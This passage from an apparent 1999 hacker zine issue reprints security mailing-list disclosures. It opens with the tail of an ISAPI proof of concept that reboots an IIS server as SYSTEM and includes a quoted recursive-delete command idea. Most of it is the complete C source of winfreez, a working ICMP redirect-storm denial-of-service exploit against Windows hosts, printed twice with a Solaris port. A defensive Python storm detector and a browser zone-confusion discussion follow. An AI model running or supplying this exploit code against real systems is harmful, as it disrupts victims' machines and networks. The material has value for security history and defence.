AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
ExitWindowsEx(EWX_REBOOT,0);
// Disable shutdown privilege.
tkp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
// Call default implementation for initialization
CHttpServer::GetExtensionVersion(pVer);
// Load description string
TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1];
ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN));
_tcscpy(pVer->lpszExtensionDesc, sz);
return TRUE;
}
void CRbExtension::Default(CHttpServerContext* pCtxt)
{
StartContent(pCtxt);
WriteTitle(pCtxt);
*pCtxt << _T("Reboot<br>");
EndContent(pCtxt);
}
>
> Patrick Chambet
> IBM Global Services
>
>
> >There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
> >that allows to execute an ISAPI extension in the security context of the
> >server itself instead of the security context of IUSR_WHATEVER. How is this
> >possible: when the server loads an ISAPI extension the first time, it calls
> >GetExtensionVersion(). During the call to this function, an attacker can
> >execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
> >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
> >any user allowed to place a "CGI" on the server can take over. Of course,
> >this problem is not limited to ISPs.
> >Fabien.
-=- Prior Discussion & further details ;
Date: Mon, 8 Mar 1999 11:27:48 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
that allows to execute an ISAPI extension in the security context of the
server itself instead of the security context of IUSR_WHATEVER. How is this
possible: when the server loads an ISAPI extension the first time, it calls
GetExtensionVersion(). During the call to this function, an attacker can
execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
any user allowed to place a "CGI" on the server can take over. Of course,
this problem is not limited to ISPs.
Fabien.
--------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 00:32:03 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
> -----Original Message-----
> From: Scott L. Krabler [mailto:scottk@visi.com]
> Sent: Monday, March 08, 1999 11:41 PM
> To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: RE: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> By this, I'm assuming the required safeguard would be to only implement
> ISAPI filters whose contents are known. Since ISAPI filters can only be
Typically, filters and extensions fulfill different purposes. For instance,
you would not implement a complete WEB based application as a filter for
performance reasons. Filters see all http "traffic" while extensions only
see the http traffic that is directed to them.
Unless you have written the filter yourself (or someone trusted in your
organization), you can't know if a filter is 100% secure either.
> installed locally(?) there shouldn't be any general risk. Yes?
This is not that simple. You can remotely install a filter under IIS if you
can cause the following sequence of events to occur:
1) Place the filter .dll in a location accessible from the web server.
2) Update the registry to register the new filter.
3) Cause a reboot of the machine or stop/start IIS.
All of this can be done from the GetExtensionVersion() call mentioned
earlier.
Finally, you can host a filter *AND* an extension in the same .dll.
Fabien.
>
> -----Original Message-----
> From: Windows NT BugTraq Mailing List
> [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer
> Sent: Monday, March 08, 1999 10:28 AM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
>
>
> There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
> that allows to execute an ISAPI extension in the security context of the
> server itself instead of the security context of IUSR_WHATEVER. How is this
> possible: when the server loads an ISAPI extension the first time, it calls
> GetExtensionVersion(). During the call to this function, an attacker can
> execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
> with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
> any user allowed to place a "CGI" on the server can take over. Of course,
> this problem is not limited to ISPs.
> Fabien.
>
--------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 18:28:24 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
Sure, however the executable that you are going to execute will run in a
separate address space and if it is spawned by IIS, it will run in the
security context of IUSR_xxx instead of SYSTEM. This is the *major*
difference between what you can do with the .dll approach and the .exe
approach.
Fabien.
> I don't know that .EXE's are that much safer. How about this:
>
> I upload 4nt.exe (Command.Com/CMD.Exe replacement program)
> I write an EXE that calls it and runs the command 'reboot'
> or even a 'del /zsx c:\*.*' (Which will recursively delete all
> files that aren't currently in use)
>
> Same idea ... different way about it.
>
> Being a developer and having the tools available, I require that
> I get to compile the code myself. That way, I can scan through
> the code to see if it's trying to do anything malicious.
> Granted, this isn't 100% foolproof, but it does help!
>
> Charlie
@HWA
04.4 Winfreez.c new exploit code for win9x and NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The full original source code is followed by a Solaris version and
further discussion, from Packetstorm/Bugtraq.
(March 11th 1999)
http://www.genocide2600.com/~tattooman/new.shtml#latest
/*
WinFreez.c by Delmore <delmore@moscowmail.com>
ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
in LAN.
Usage: winfreez sendtoip sendfromip time
where <sendtoip> is victim host, <sendfromip> is router
for victim host, <time> is time in seconds to freeze victim.
Note:
I've written small exploit for freeze win9x/nt boxes in LAN.
Proggy initiates ICMP/Redirect-host messages storm from router
(use router ip). Windows will receive redirect-host messages
and change own route table, therefore it will be frozen
or slowly working during this time.
On victim machine route table changes viewing with:
ROUTE PRINT
command in ms-dos box.
Exploit show different result for different system configuration.
System results:
p200/16ram/win95osr2 is slowly execute application
after 20 seconds of storm.
p233/96ram/nt4-sp4 is slowly working after 30
seconds of storm.
p2-266/64ram/win95 working slowly and can't normal execute
application.
Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
gcc ./winfreez.c -o winfreez
--- for Slackware Linux, Kernel 2.0.30
If you can't compile due to ip_sum not defined errors,
replace (line 207):
ip->ip_sum = 0;
to line:
ip->ip_csum = 0;
---
Soldiers Of Satan group
Russia, Moscow State University, 05 march 1999
http://sos.nanko.ru
Thanx to Mark Henderson.
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* Structure of an icmp header (from sparc header).
*/
struct icmp {
u_char icmp_type; /* type of message, see below */
u_char icmp_code; /* type sub code */
u_short icmp_cksum; /* ones complement cksum of struct */
union {
u_char ih_pptr; /* ICMP_PARAMPROB */
struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
struct ih_idseq {
n_short icd_id;
n_short icd_seq;
} ih_idseq;
int ih_void;
} icmp_hun;
#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void
union {
struct id_ts {
n_time its_otime;
n_time its_rtime;
n_time its_ttime;
} id_ts;
struct id_ip {
struct ip idi_ip;
/* options and then 64 bits of data */
} id_ip;
u_long id_mask;
char id_data[1];
} icmp_dun;
#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data
};
u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
void main (int argc, char **argv)
{
time_t wtime;
char *sendtoip, *sendfromip;
int s, on;
if (argc != 4)
{
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
exit (1);
}
sendtoip = (char *)malloc(strlen(argv[1]) + 1);
strcpy(sendtoip, argv[1]);
sendfromip = (char *)malloc(strlen(argv[2]) + 1);
strcpy(sendfromip, argv[2]);
wtime = atol(argv[3]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf (stderr, "socket creation error\n" );
exit (1);
}
#ifdef IP_HDRINCL
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
{
fprintf (stderr, "sockopt IP_HDRINCL error\n" );
exit (1);
}
#endif
printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
printf("sendto = %s\n", sendtoip);
printf("sendfrom = %s\n", sendfromip);
printf("time = %i s\n", wtime);
attack( sendtoip, sendfromip, wtime, s );
free( (void *) sendtoip );
free( (void *) sendfromip );
}
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
time_t curtime, endtime;
int i1, i2, i3, i4;
char redir[21];
char buf[100];
struct ip *ip = (struct ip *) buf;
struct icmp *icmp = (struct icmp *) (ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
if(wtime==0) return;
if ((hp = gethostbyname (sendtoip)) == NULL)
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
{
fprintf (stderr, "%s: unknown sendto\n", sendtoip);
exit (1);
}
if ((hp = gethostbyname (sendfromip)) == NULL)
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
{
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
exit (1);
}
endtime = time(NULL) + wtime;
srand((unsigned int) endtime);
do {
bzero (buf, sizeof buf);
/* sendto/gateway */
hp = gethostbyname (sendtoip);
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
/* sendfrom */
hp = gethostbyname (sendfromip);
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
/* generate redirect*/
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
bzero (redir, sizeof redir);
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
hp = gethostbyname (redir);
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons (sizeof buf);
ip->ip_id = htons (4321);
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills this in */
bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr));
icmp->icmp_ip.ip_v = 4;
icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
icmp->icmp_ip.ip_tos = 0;
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
icmp->icmp_ip.ip_id = htons (3722);
icmp->icmp_ip.ip_off = 0;
icmp->icmp_ip.ip_ttl = 254;
icmp->icmp_ip.ip_p = 1;
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_REDIRECT;
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip));
if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 )
{
fprintf (stderr, "sendto error\n");
exit (1);
}
}while (time(NULL)!=endtime);
}
/*
* in_cksum -- Checksum routine for Internet Protocol family headers (C
* Version) - code from 4.4 BSD
*/
u_short in_cksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
-=- And a Solaris version:
Date: Tue, 9 Mar 1999 22:34:32 -0500
From: Max Schubert <mschube@jgvandyke.com>
To: BUGTRAQ@netspace.org
Subject: Winfreeze.c for Solaris ...
Hi,
Script kiddie number 25006 here :) ... apologize if this is too
trivial to be worth your time ....
This is just a port of the Winfreeze.c ICMP redirect exploit for Solaris
(posted earlier today) ... tested using Solaris 2.5.1 ...
max
-------
/*
WinFreez.c by Delmore <delmore@moscowmail.com>
ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
in LAN.
Usage: winfreez sendtoip sendfromip time
where <sendtoip> is victim host, <sendfromip> is router
for victim host, <time> is time in seconds to freeze victim.
Note:
I've written small exploit for freeze win9x/nt boxes in LAN.
Proggy initiates ICMP/Redirect-host messages storm from router
(use router ip). Windows will receive redirect-host messages
and change own route table, therefore it will be frozen
or slowly working during this time.
On victim machine route table changes viewing with:
ROUTE PRINT
command in ms-dos box.
Exploit show different result for different system configuration.
System results:
p200/16ram/win95osr2 is slowly execute application
after 20 seconds of storm.
p233/96ram/nt4-sp4 is slowly working after 30
seconds of storm.
p2-266/64ram/win95 working slowly and can't normal execute
application.
Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
gcc ./winfreez.c -o winfreez
--- for Slackware Linux, Kernel 2.0.30
If you can't compile due to ip_sum not defined errors,
replace (line 207):
ip->ip_sum = 0;
to line:
ip->ip_csum = 0;
---
Soldiers Of Satan group
Russia, Moscow State University, 05 march 1999
http://sos.nanko.ru
Thanx to Mark Henderson.
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <errno.h>
/*
* Structure of an icmp header (from sparc header).
*/
u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
void main (int argc, char **argv)
{
time_t wtime;
/* setsockopt on Solaris 2.5.1 wants (char *) for 4th arg */
char *sendtoip, *sendfromip, *on;
int s;
if (argc != 4)
{
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
exit (1);
}
sendtoip = (char *)malloc(strlen(argv[1]) + 1);
strcpy(sendtoip, argv[1]);
sendfromip = (char *)malloc(strlen(argv[2]) + 1);
strcpy(sendfromip, argv[2]);
wtime = atol(argv[3]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf (stderr, "socket creation error: %s\n", strerror(errno));
exit (1);
}
#ifdef IP_HDRINCL
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0)
{
fprintf (stderr, "sockopt IP_HDRINCL error\n" );
exit (1);
}
#endif
printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
printf("sendto = %s\n", sendtoip);
printf("sendfrom = %s\n", sendfromip);
printf("time = %i s\n", wtime);
attack( sendtoip, sendfromip, wtime, s );
free( (void *) sendtoip );
free( (void *) sendfromip );
}
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
time_t curtime, endtime;
int i1, i2, i3, i4;
char redir[21];
char buf[100];
struct ip *ip = (struct ip *) buf;
struct icmp *icmp = (struct icmp *) (ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
if(wtime==0) return;
if ((hp = gethostbyname (sendtoip)) == NULL)
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
{
fprintf (stderr, "%s: unknown sendto\n", sendtoip);
exit (1);
}
if ((hp = gethostbyname (sendfromip)) == NULL)
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
{
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
exit (1);
}
endtime = time(NULL) + wtime;
srand((unsigned int) endtime);
do {
bzero (buf, sizeof buf);
/* sendto/gateway */
hp = gethostbyname (sendtoip);
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
/* sendfrom */
hp = gethostbyname (sendfromip);
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
/* generate redirect*/
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
bzero (redir, sizeof redir);
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
hp = gethostbyname (redir);
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons (sizeof buf);
ip->ip_id = htons (4321);
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills this in */
bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof
(ip->ip_dst.s_addr));
icmp->icmp_ip.ip_v = 4;
icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
icmp->icmp_ip.ip_tos = 0;
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
icmp->icmp_ip.ip_id = htons (3722);
icmp->icmp_ip.ip_off = 0;
icmp->icmp_ip.ip_ttl = 254;
icmp->icmp_ip.ip_p = 1;
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_REDIRECT;
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof
(*ip));
if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) <
0 )
{
fprintf (stderr, "sendto error\n");
exit (1);
}
}while (time(NULL)!=endtime);
}
/*
* in_cksum -- Checksum routine for Internet Protocol family headers (C
* Version) - code from 4.4 BSD
*/
u_short in_cksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
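From the defender's side, the storm described in the winfreez header comment has a distinctive shape on the wire: a burst of ICMP type 5 (redirect) messages from one source, each quoting a different destination and naming a gateway that makes no sense for the receiving host. The Python below is an added example written for this digest, not code from the HWA issue, from Delmore or from Max Schubert. It parses IPv4/ICMP bytes, verifies the ICMP checksum with the same RFC 1071 one's-complement arithmetic as the in_cksum() routine above, and raises an alert once a source exceeds a redirect rate inside a sliding time window. The packets it feeds itself are constructed fixtures using documentation address ranges (192.0.2.x, 203.0.113.x); the window length and threshold are assumptions.

```python
import socket
import struct
from collections import defaultdict, deque
from typing import Deque, Dict, List, Optional, Tuple

ICMP_PROTO = 1
ICMP_REDIRECT = 5        # ICMP type used by the storm
REDIRECT_HOST = 1        # code winfreez sets ("redirect host")


def in_cksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum: the same arithmetic as the 4.4BSD
    in_cksum() reproduced in winfreez.c, over big-endian 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_redirect(pkt: bytes) -> Optional[Dict[str, object]]:
    """Return the fields of an IPv4 ICMP redirect, or None if pkt is not one
    (wrong protocol/type, truncated, or the ICMP checksum does not verify)."""
    if len(pkt) < 20:
        return None
    vihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or proto != ICMP_PROTO or ihl < 20 or total_len < ihl:
        return None
    icmp = pkt[ihl:min(total_len, len(pkt))]
    # 8-byte ICMP header plus the quoted 20-byte IP header of the datagram
    # the redirect claims to be about; a verified sum over the whole ICMP
    # message yields zero.
    if len(icmp) < 28 or icmp[0] != ICMP_REDIRECT or in_cksum(icmp) != 0:
        return None
    return {
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "code": icmp[1],
        "gateway": socket.inet_ntoa(icmp[4:8]),
        "target": socket.inet_ntoa(icmp[24:28]),  # inner header's destination
    }


class RedirectStormDetector:
    """Counts checksum-valid redirects per source in a sliding time window."""

    def __init__(self, window_s: float = 1.0, max_per_window: int = 20) -> None:
        self.window_s = window_s
        self.max_per_window = max_per_window
        self._seen: Dict[str, Deque[Tuple[float, str]]] = defaultdict(deque)

    def observe(self, ts: float, pkt: bytes) -> Optional[str]:
        """Feed one captured packet with its timestamp; return an alert string
        once the source crosses the threshold, otherwise None."""
        info = parse_redirect(pkt)
        if info is None:
            return None
        q = self._seen[str(info["src"])]
        q.append((ts, str(info["target"])))
        while q and ts - q[0][0] > self.window_s:
            q.popleft()
        if len(q) <= self.max_per_window:
            return None
        targets = {t for _, t in q}
        return ("ICMP redirect storm from %s: %d redirects in %.1fs for %d "
                "distinct destinations, gateway %s"
                % (info["src"], len(q), self.window_s, len(targets), info["gateway"]))


def constructed_redirect(src: str, dst: str, gateway: str, target: str) -> bytes:
    """Test fixture only: a minimal, checksum-valid host redirect (outer IP
    header, 8-byte ICMP header, quoted inner IP header)."""
    aton = socket.inet_aton
    inner = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 48, 3722, 0, 254, ICMP_PROTO,
                        0, aton(dst), aton(target))
    inner = inner[:10] + struct.pack("!H", in_cksum(inner)) + inner[12:]
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_HOST, 0, aton(gateway)) + inner
    icmp = icmp[:2] + struct.pack("!H", in_cksum(icmp)) + icmp[4:]
    outer = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 4321, 0, 255,
                        ICMP_PROTO, 0, aton(src), aton(dst))
    outer = outer[:10] + struct.pack("!H", in_cksum(outer)) + outer[12:]
    return outer + icmp


def demo() -> List[str]:
    """Replay a constructed burst of 30 redirects within 0.3 s; return alerts."""
    det = RedirectStormDetector()
    alerts = []
    for i in range(30):
        pkt = constructed_redirect("192.0.2.1", "192.0.2.50", "192.0.2.50",
                                   "203.0.113.%d" % i)
        alert = det.observe(i * 0.01, pkt)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Rejecting packets whose ICMP checksum fails matters because the storm tool sends a fixed 100-byte frame; a counter that accepted unverified type-5 bytes would be trivially inflated by any junk on the wire. The rate threshold is what distinguishes a storm from the one or two legitimate redirects a router emits when a host uses the wrong first hop; hosts configured to ignore redirects altogether (Linux's net.ipv4.conf.all.accept_redirects sysctl is one such switch) are not affected by the route-table churn at all.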
@HWA
04.5 Unknown Zone:
Windows doesn't properly distinguish between intra and internet zones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 5 Mar 1999 21:53:18 -0500
From: Jim Paris <jim@JTAN.COM>
To: BUGTRAQ@netspace.org
Subject: More Internet Explorer zone confusion
Even after the patch described in Microsoft Security Bulletin MS98-016
(http://www.microsoft.com/security/bulletins/ms98-016.asp), IE4 still
has big problems with distinguishing between sites that belong in the
"Internet Zone" and sites that belong in the "Local Intranet Zone".
MS98-016 dealt with addresses such as http://031713501415/, which
resolve to Internet hosts but are categorized as being in the "Local
Intranet Zone".
I've found two cases where the problem still exists. The first is when
the user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
set to include domains such as "com". In that case, the address
http://microsoft/
will retrieve the page at
http://microsoft.com/
but it will be considered to be in the "Local Intranet Zone".
The second case occurs when a host has an assigned alias in the hosts
table (C:\WINDOWS\HOSTS). A host table entry such as:
207.46.131.13 hello
will cause the URL
http://hello/
to retrieve the page at http://207.45.131.13/, but (yep, you guessed it)
Internet Explorer still considers it to be in the "Local Intranet Zone".
This has security implications, since settings for the Local Intranet
Zone may be (and, by default, ARE) less secure than those for the
Internet Zone.
And the funny part? Microsoft's response when I told them this:
--8<---cut here-----------------------------------------
Hi Jim -
Had a talk with one of the IE developers, and this behavior is correct.
Here's why: it's impossible to tell from an IP address whether it's internal
or external. 100.100.100.100, or any other address, could be either
internal or external, depending on whether you're behind a firewall or not.
That means that IE has to rely on the URL. By convention, an URL that does
not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
internal site. I'm told that this is how all web browsers make the
distinction. You have to make specific reconfigurations to allow the
dotless URLs to resolve externally. Thanks,
Secure@Microsoft.Com
--8<---cut here-----------------------------------------
"This behavior is correct"?!?!?! Give me a break. They obviously
didn't think so when they released the MS98-016 bulletin.
Jim Paris
jim@jtan.com
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 03:56:27 -0500
From: Jeremy Nimmer <bugtraq.user@parity.mit.edu>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
>MS98-016 dealt with addresses such as http://031713501415/
>...
>user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
>...
>The second case occurs when a host has an assigned alias in the hosts
>...
>"This behavior is correct"?!?!?! Give me a break. They obviously
>didn't think so when they released the MS98-016 bulletin.
>
>Jim Paris
>jim@jtan.com
The difference between MS98-016 and your examples is simple. The bulletin
addressed an issue where an external site could, without your control, fool
your browser into thinking a remote site was "local intranet". In your
examples, the user must choose specific settings to allow the problem to
occur. If you are concerned about the problem, simply remove .com, etc.
from your DNS suffix search, and don't put nasty hosts in your hosts file.
The zone settings are not meant to be rock-solid security protection. If
they pose a risk to you, set all zones to the maximum security. This was
all already talked about when the above-mentioned bulletin came out.
In the end, this is not a "bug" in the browser - it's a configuration
problem. While worthy of mention, it does not deserve flamage.
Thanks,
-= remmiN ymereJ | Jeremy Nimmer =-
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 23:37:28 +1300
From: Oliver Lineham <oliver@LINEHAM.CO.NZ>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
At 21:53 5/03/99 -0500, you wrote:
Yech.
>That means that IE has to rely on the URL. By convention, an URL that does
>not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
>internal site. I'm told that this is how all web browsers make the
>distinction. You have to make specific reconfigurations to allow the
>dotless URLs to resolve externally. Thanks,
This is insane - and most probably not how it distinguishes domains at all.
Such a system implies that the "dot-something"s are hard-coded into the
browser! This would be a similar flaw to the original cookie
specification's one about domains that I announced last year. Consider:
- Country domains. They're not dot-somethings, but under this regime
anything from somewhere like New Zealand (.nz) would be a "Local Intranet
Site".
- New TLDs. Internic goes and adds a .web or .store or something that
didn't exist when the browser was released. I'm sure all the e-commerce
sites on .store would love their servers being considered "Local Intranet
Sites"!
If this is how the zones are implemented, then it's insane. If not, then
IE's claim of being able to distinguish intranet sites from internet ones
is an outright lie and the "feature" should be removed.
Oliver
---------------------------------------------------
Internet Services / Webdesign / Strategic Planning
PO Box 30-481, Lower Hutt, NZ oliver@lineham.co.nz
Phone +64 4 566-0627 Facsimile +64 4 570-1900
--------------------------------------------------------------------------------
Date: Mon, 8 Mar 1999 09:06:23 +0000
From: David E. Smith <dave@TECHNOPAGAN.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: More Internet Explorer zone confusion
On Fri, 5 Mar 1999, Jim Paris wrote about the Local Intranet Zone.
All the comments made are, technically, correct, but Microsoft could have
at least tried. None of these are foolproof, but they're a start.
* Be paranoid about entries in the hosts file. Arguably, hosts files are
obsolete, thanks to DNS. (No, I won't make the argument.)
* Warning dialog boxes for the above, and maybe for anything where the TLD
is guessed at. (The http://microsoft/ example. Just warn the user that the
requested site was guessed, give some sane options like `Go there, treat
it as Internet', `Go there, treat it as local', `Don't go there', and so
on.)
* Anything that doesn't resolve to a designated local zone (10.*.*.*, and
the other reserved addresses) gets the same warning.
Or, just change the default behaviour on all those to treat the site as
Internet rather than intranet. Probably easier that way, though a bit more
troublesome for the user, especially when we guess wrong.
Care to take bets on whether anything even remotely like this is ever
done?
